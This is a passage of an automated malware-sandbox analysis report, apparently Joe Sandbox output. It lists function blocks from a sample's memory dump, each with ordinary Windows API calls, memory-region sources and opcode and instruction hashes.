                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long$AttributesLayered
                                                                  • String ID:
                                                                  • API String ID: 2169480361-0
                                                                  • Opcode ID: 5773cbdd7babed93be18f0fa5df6903f36872505403e8d2a933ee3262065df7a
                                                                  • Instruction ID: 8f8645d02faa3ccb9adaab72afefc057b4dd3add9050820207ab96f8bbee0654
                                                                  • Opcode Fuzzy Hash: 5773cbdd7babed93be18f0fa5df6903f36872505403e8d2a933ee3262065df7a
                                                                  • Instruction Fuzzy Hash: C811D032305514AFD704AB24DC45FBA77A9EF85320F18411AFA26DB3E2DBA4AD01DB94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00F2F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00F2E46F,?,?,?,00F2F262,00000000,000000EF,00000119,?,?), ref: 00F2F867
                                                                    • Part of subcall function 00F2F858: lstrcpyW.KERNEL32 ref: 00F2F88D
                                                                    • Part of subcall function 00F2F858: lstrcmpiW.KERNEL32(00000000,?,00F2E46F,?,?,?,00F2F262,00000000,000000EF,00000119,?,?), ref: 00F2F8BE
                                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00F2F262,00000000,000000EF,00000119,?,?,00000000), ref: 00F2E488
                                                                  • lstrcpyW.KERNEL32 ref: 00F2E4AE
                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,00F2F262,00000000,000000EF,00000119,?,?,00000000), ref: 00F2E4E2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                  • String ID: cdecl
                                                                  • API String ID: 4031866154-3896280584
                                                                  • Opcode ID: ec66ec0bfed661533b8ff600e142d8d36b1d2d24633f0aad72ef974d93fc27f6
                                                                  • Instruction ID: 22a6cca48094ae8d96804c01e69bc9111ac9626ad8f355f157a9c5fdabe581fd
                                                                  • Opcode Fuzzy Hash: ec66ec0bfed661533b8ff600e142d8d36b1d2d24633f0aad72ef974d93fc27f6
                                                                  • Instruction Fuzzy Hash: AE11D03A200359AFDB25AF24EC45D7A77B8FF45360B50402AF80ACB2A0EB71D940E791
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • _free.LIBCMT ref: 00F05331
                                                                    • Part of subcall function 00EF593C: __FF_MSGBANNER.LIBCMT ref: 00EF5953
                                                                    • Part of subcall function 00EF593C: __NMSG_WRITE.LIBCMT ref: 00EF595A
                                                                    • Part of subcall function 00EF593C: RtlAllocateHeap.NTDLL(01270000,00000000,00000001,?,00000004,?,?,00EF1003,?), ref: 00EF597F
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap_free
                                                                  • String ID:
                                                                  • API String ID: 614378929-0
                                                                  • Opcode ID: 3e884a63e8ff9af10612405dd7f7328f22b309c9dadecfa3d0689f4fb024d431
                                                                  • Instruction ID: afaf7653e6def00e0926c9a65edd7ca7ccf4580eb1ed822f3b6406e72afa2f26
                                                                  • Opcode Fuzzy Hash: 3e884a63e8ff9af10612405dd7f7328f22b309c9dadecfa3d0689f4fb024d431
                                                                  • Instruction Fuzzy Hash: F311AB32905A1DAFCB252F74AC0577B37D99F14BB1B204916F658AA1D0DEF18940BF50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00EE5B58
                                                                    • Part of subcall function 00EE56F8: _memset.LIBCMT ref: 00EE5787
                                                                    • Part of subcall function 00EE56F8: _wcscpy.LIBCMT ref: 00EE57DB
                                                                    • Part of subcall function 00EE56F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EE57EB
                                                                  • KillTimer.USER32(?,00000001,?,?), ref: 00EE5BAD
                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00EE5BBC
                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F20D7C
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                  • String ID:
                                                                  • API String ID: 1378193009-0
                                                                  • Opcode ID: 8cb1b1531c47f6addc26a620527abf049c5209a5dac2823fa502fbb29e294f0e
                                                                  • Instruction ID: ba4181fb336571a51730bb47b3c42120d26ea578b2389654903c4ef9a9cb629e
                                                                  • Opcode Fuzzy Hash: 8cb1b1531c47f6addc26a620527abf049c5209a5dac2823fa502fbb29e294f0e
                                                                  • Instruction Fuzzy Hash: FC210A729057989FE7728B249C95BEBBBEC9F01308F04048DE69A66142CB742984DB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00F34385
                                                                  • _memset.LIBCMT ref: 00F343A6
                                                                  • DeviceIoControl.KERNEL32 ref: 00F343F8
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00F34401
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                  • String ID:
                                                                  • API String ID: 1157408455-0
                                                                  • Opcode ID: 0ba250dfa1a17103d8a26c92f2eb64c20149631a0c9224fc214f9f694f8faf42
                                                                  • Instruction ID: 1123d5138938baf41e24e55664f2bfbe37f45c7e7387aa696c33506a79a29439
                                                                  • Opcode Fuzzy Hash: 0ba250dfa1a17103d8a26c92f2eb64c20149631a0c9224fc214f9f694f8faf42
                                                                  • Instruction Fuzzy Hash: A511E771D0122CBAD7309BA5AC4DFABBB7CEF45730F10459AF908E7280D6745E809BA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00EE402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F37E51,?,?,00000000), ref: 00EE4041
                                                                    • Part of subcall function 00EE402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F37E51,?,?,00000000,?,?), ref: 00EE4065
                                                                  • gethostbyname.WSOCK32(?,?,?), ref: 00F46A84
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00F46A8F
                                                                  • _memmove.LIBCMT ref: 00F46ABC
                                                                  • inet_ntoa.WSOCK32(?), ref: 00F46AC7
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                  • String ID:
                                                                  • API String ID: 1504782959-0
                                                                  • Opcode ID: 1214319e34493d53010bb3a0fd96a9260d6701f4f6661f601cca612c19f31912
                                                                  • Instruction ID: d77df0b9df6fd8ec50925b6ae4ee23411c9e075c943099a7e1de7b3b92c2a915
                                                                  • Opcode Fuzzy Hash: 1214319e34493d53010bb3a0fd96a9260d6701f4f6661f601cca612c19f31912
                                                                  • Instruction Fuzzy Hash: A2115172500109AFCB04EBA4CD46DAEB7F9EF14310B144065F902F72A2DF719E10DB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00F29719
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F2972B
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F29741
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F2975C
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: a6055ed68093884d7cd5bd5664e87da730c30e82fdf31d7e3b4278575fb2f697
                                                                  • Instruction ID: b33b91bc9dc113192c9eade3e751a02d52b32d559e8e9951e1a3c6439032f175
                                                                  • Opcode Fuzzy Hash: a6055ed68093884d7cd5bd5664e87da730c30e82fdf31d7e3b4278575fb2f697
                                                                  • Instruction Fuzzy Hash: 24114C39900218FFDB10DF95CD84E9DBBB8FB48710F204095E900B7250D6716E10EB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00ED29E2: GetWindowLongW.USER32(?,000000EB), ref: 00ED29F3
                                                                  • DefDlgProcW.USER32(?,00000020,?), ref: 00ED16B4
                                                                  • GetClientRect.USER32(?,?), ref: 00F0B93C
                                                                  • GetCursorPos.USER32(?), ref: 00F0B946
                                                                  • ScreenToClient.USER32 ref: 00F0B951
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                                  • String ID:
                                                                  • API String ID: 4127811313-0
                                                                  • Opcode ID: da14cf328e5ef60f25f55955e3c1c6e9d1441551bfa3dcf92c89eb96091a8d07
                                                                  • Instruction ID: 5e2b408f301a23427602664cfd72c5734ebdddc351fd90406e22221307300856
                                                                  • Opcode Fuzzy Hash: da14cf328e5ef60f25f55955e3c1c6e9d1441551bfa3dcf92c89eb96091a8d07
                                                                  • Instruction Fuzzy Hash: 23115535A00119BBCB00EF98D885DFE77B9EB04300F140496F921E7240C731BA52EBA2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CreateWindowExW.USER32 ref: 00ED214F
                                                                  • GetStockObject.GDI32(00000011), ref: 00ED2163
                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00ED216D
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: CreateMessageObjectSendStockWindow
                                                                  • String ID:
                                                                  • API String ID: 3970641297-0
                                                                  • Opcode ID: 29c90c29f44933f8417ac1283b64c323d06b5b51f3195a949355c2c68c45bc2e
                                                                  • Instruction ID: 3b911985d8f4a4879fb05d4f041323100d3b24fc78db47d4e19b8af7b3579497
                                                                  • Opcode Fuzzy Hash: 29c90c29f44933f8417ac1283b64c323d06b5b51f3195a949355c2c68c45bc2e
                                                                  • Instruction Fuzzy Hash: 20118B7210220DBFDF024F90DC44EEBBB69EF68358F14411AFB1462260CB719C61ABA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F304EC,?,00F3153F,?,00008000), ref: 00F3195E
                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00F304EC,?,00F3153F,?,00008000), ref: 00F31983
                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F304EC,?,00F3153F,?,00008000), ref: 00F3198D
                                                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,00F304EC,?,00F3153F,?,00008000), ref: 00F319C0
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: CounterPerformanceQuerySleep
                                                                  • String ID:
                                                                  • API String ID: 2875609808-0
                                                                  • Opcode ID: 2551e0088be397177736dbf97486c49a3222240074941450538a3989772406bf
                                                                  • Instruction ID: 83c250e6b26a503ed725a8217b3068723384e1a47e9d88e015633b755180930f
                                                                  • Opcode Fuzzy Hash: 2551e0088be397177736dbf97486c49a3222240074941450538a3989772406bf
                                                                  • Instruction Fuzzy Hash: A5113C31D0551DDBCF009FE5D958BEEBB78FF09761F114155E980B2241CB309650AB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00F5E1EA
                                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 00F5E201
                                                                  • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 00F5E216
                                                                  • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 00F5E234
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Type$Register$FileLoadModuleNameUser
                                                                  • String ID:
                                                                  • API String ID: 1352324309-0
                                                                  • Opcode ID: c795461265b7fcf0e675441f199326794e93e681457581e535a615459277731c
                                                                  • Instruction ID: 5f5f17df5b6d0380d84a75597b9cf1ae4a2e7b1a18b2087906ab50d815a90361
                                                                  • Opcode Fuzzy Hash: c795461265b7fcf0e675441f199326794e93e681457581e535a615459277731c
                                                                  • Instruction Fuzzy Hash: FA1152756053089BE3348F51DD08F937BBCEB00B05F108559AB26D6054DBB0E608BB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                  • String ID:
                                                                  • API String ID: 3016257755-0
                                                                  • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                  • Instruction ID: 5bd95c3b7c038162ffb9d7454effcd39db6d1948b7179f01deb4ea5df1ffda73
                                                                  • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                  • Instruction Fuzzy Hash: 48019E3284824EBBCF126E84CC01CEE3F62BB19350B188595FA1858171C336E9B1BF81
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetWindowRect.USER32 ref: 00F5B956
                                                                  • ScreenToClient.USER32 ref: 00F5B96E
                                                                  • ScreenToClient.USER32 ref: 00F5B992
                                                                  • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F5B9AD
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                                  • String ID:
                                                                  • API String ID: 357397906-0
                                                                  • Opcode ID: 9aa9bc957516817ab4c5829a858f9c981949d56f52f810bfbbf11f5ef4b21fa8
                                                                  • Instruction ID: a8dc85bc2285c64c74f36f22aa754a0b90bec7dde61737b66686744b8b6c2b9a
                                                                  • Opcode Fuzzy Hash: 9aa9bc957516817ab4c5829a858f9c981949d56f52f810bfbbf11f5ef4b21fa8
                                                                  • Instruction Fuzzy Hash: A61163B9D0420DEFDB41CF98C884AEEBBF9FB48310F104156E924E3210DB71AA659F50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$CloseCreateHandleProcess
                                                                  • String ID:
                                                                  • API String ID: 3277943733-0
                                                                  • Opcode ID: 4b9301c0a95b995543ea4d20164a7afa3a644a5139e38ada9709396b5f4026a8
                                                                  • Instruction ID: 2572ea82dac7ea45895c0a933f6024e3799611e90e13325eb756193fc0c0eb69
                                                                  • Opcode Fuzzy Hash: 4b9301c0a95b995543ea4d20164a7afa3a644a5139e38ada9709396b5f4026a8
                                                                  • Instruction Fuzzy Hash: CFF0F4B254030C7FF65027655C06FB73A5DDB0A799F001422FB08E5192DFB55811A7A8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00F371A1
                                                                    • Part of subcall function 00F37C7F: _memset.LIBCMT ref: 00F37CB4
                                                                  • _memmove.LIBCMT ref: 00F371C4
                                                                  • _memset.LIBCMT ref: 00F371D1
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00F371E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                  • String ID:
                                                                  • API String ID: 48991266-0
                                                                  • Opcode ID: 307b039b95f3a47cfd450dd5a3d0e83bf2316d2e55d05b648da7e961c40eb996
                                                                  • Instruction ID: ed146c794a2514b4967f65cd2a3193fcfb40551f1d2599168706abdccd6ba8aa
                                                                  • Opcode Fuzzy Hash: 307b039b95f3a47cfd450dd5a3d0e83bf2316d2e55d05b648da7e961c40eb996
                                                                  • Instruction Fuzzy Hash: F6F05476200104ABCF016F55DC85A5ABB69EF45360F04C051FE085E21BCB75A911EBB4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00ED16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00ED1729
                                                                    • Part of subcall function 00ED16CF: SelectObject.GDI32(?,00000000), ref: 00ED1738
                                                                    • Part of subcall function 00ED16CF: BeginPath.GDI32(?), ref: 00ED174F
                                                                    • Part of subcall function 00ED16CF: SelectObject.GDI32(?,00000000), ref: 00ED1778
                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F5C3E8
                                                                  • LineTo.GDI32(00000000,?,?), ref: 00F5C3F5
                                                                  • EndPath.GDI32(00000000), ref: 00F5C405
                                                                  • StrokePath.GDI32(00000000), ref: 00F5C413
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                  • String ID:
                                                                  • API String ID: 1539411459-0
                                                                  • Opcode ID: d671a075a11ba8b199f4811f9ed5f68376acd2fefc5eddda26b399da8109d8b1
                                                                  • Instruction ID: a110d7a29fd6a36e43366a165fa0dfbe81dbac3a2d4dc74f053cd07e521aeeb1
                                                                  • Opcode Fuzzy Hash: d671a075a11ba8b199f4811f9ed5f68376acd2fefc5eddda26b399da8109d8b1
